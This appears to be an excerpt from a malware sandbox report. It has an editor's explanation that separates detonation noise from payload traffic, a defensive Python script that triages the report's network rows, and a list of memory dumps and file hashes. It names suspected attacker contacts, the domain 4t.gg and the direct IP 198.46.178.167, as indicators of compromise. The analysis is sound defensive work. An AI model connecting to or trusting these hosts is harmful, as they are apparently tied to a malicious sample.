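Most rows in the two Network tables above (behavioral1 and behavioral2) are detonation noise rather than payload traffic: the in-addr.arpa entries are PTR lookups issued by the sandbox, r10.o.lencr.org is the Let's Encrypt OCSP responder contacted while validating the 4t.gg TLS certificate, crl.microsoft.com is CRL distribution, and roaming.officeapps.live.com is Office roaming-settings telemetry. What is left for an analyst is the 4t.gg contact over 443 and the direct HTTP connection to 198.46.178.167 with no hostname. The following script is an added example written for this page, not part of the sandbox report: it parses rows in the report's own four-column layout, buckets them, deduplicates repeats, and returns the hosts that still need a decision. The rows are copied from both tables; the allowlist of infrastructure suffixes is an assumption a SOC would tune for its environment.

```python
"""Bucket the report's network rows into attacker-relevant contacts and detonation noise.
Added example by the editor, not sandbox output; the allowlist is an assumption."""
import ipaddress

# Rows copied from the behavioral1 and behavioral2 Network tables (repeats kept
# on purpose so the deduplication is visible).
NETWORK_ROWS = """\
Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 198.46.178.167:80 198.46.178.167 tcp
KR 221.146.204.133:443 4t.gg tcp
US 198.46.178.167:80 198.46.178.167 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 167.178.46.198.in-addr.arpa udp
"""

# Side effects of running the sample rather than payload traffic (assumption,
# tune per environment): Let's Encrypt OCSP, Microsoft CRL distribution,
# Office roaming-settings telemetry.
INFRA_SUFFIXES = (".lencr.org", "crl.microsoft.com", ".officeapps.live.com")

def parse_rows(text):
    """Parse 'Country Destination Domain Proto' rows; the header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[0] == "Country":
            continue
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows

def is_ip_literal(s):
    try:
        ipaddress.ip_address(s)
        return True
    except ValueError:
        return False

def classify(row):
    d = row["domain"]
    if d.endswith(".in-addr.arpa"):
        return "reverse_lookup"   # PTR lookups by the sandbox/OS, not the payload
    if d.endswith(INFRA_SUFFIXES):
        return "infrastructure"   # certificate validation and Office telemetry
    if is_ip_literal(d):
        return "direct_ip"        # no hostname at all: a server hard-coded in the payload
    return "review"               # unknown domain, needs an analyst decision

def triage(text):
    """Deduplicated (domain, destination, proto) triples per bucket, in table order."""
    buckets = {}
    for row in parse_rows(text):
        key = (row["domain"], f'{row["ip"]}:{row["port"]}', row["proto"])
        bucket = buckets.setdefault(classify(row), [])
        if key not in bucket:
            bucket.append(key)
    return buckets

def review_iocs(text):
    """Hosts that still need a decision: unknown domains plus direct-IP contacts."""
    b = triage(text)
    return sorted({k[0] for k in b.get("review", []) + b.get("direct_ip", [])})

if __name__ == "__main__":
    for bucket, keys in triage(NETWORK_ROWS).items():
        print(bucket)
        for domain, dest, proto in keys:
            print("  ", domain, dest, proto)
    print("review:", review_iocs(NETWORK_ROWS))
```

On the rows above the review set is exactly 4t.gg (DNS plus the 443 connection to 221.146.204.133) and 198.46.178.167; everything else lands in the reverse_lookup or infrastructure buckets. The allowlist is deliberately suffix-based so a single OCSP or CRL host does not have to be enumerated, but it must not be widened to whole cloud domains, or attacker hosting on shared infrastructure would disappear into it.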

Files

memory/452-1-0x00007FFE4E96D000-0x00007FFE4E96E000-memory.dmp

memory/452-3-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

memory/452-2-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

memory/452-0-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

memory/452-5-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-6-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-4-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

memory/452-7-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

memory/452-9-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-8-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-12-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-11-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-13-0x00007FFE0C820000-0x00007FFE0C830000-memory.dmp

memory/452-10-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-14-0x00007FFE0C820000-0x00007FFE0C830000-memory.dmp

memory/4876-34-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/4876-35-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-39-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/452-40-0x00007FFE4E96D000-0x00007FFE4E96E000-memory.dmp

memory/452-41-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/4876-45-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

memory/4876-46-0x00007FF6517B0000-0x00007FF6517B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 36cf0c181a83f35cc8de25be34cfa3ad
SHA1 3e1110bf9c7b54e24f5205f2da9314361cb9e938
SHA256 17aae8ffe8556b87667416ad546b20890111943c4a00326cfd3d5ff472feae36
SHA512 3a42d88643a9eca7e5bf732e089172905df153ae4f8f92bbbc883a484376091244893bd643344a436519f63db75332ee0144efd16d3d79c9d51767f5f03515dc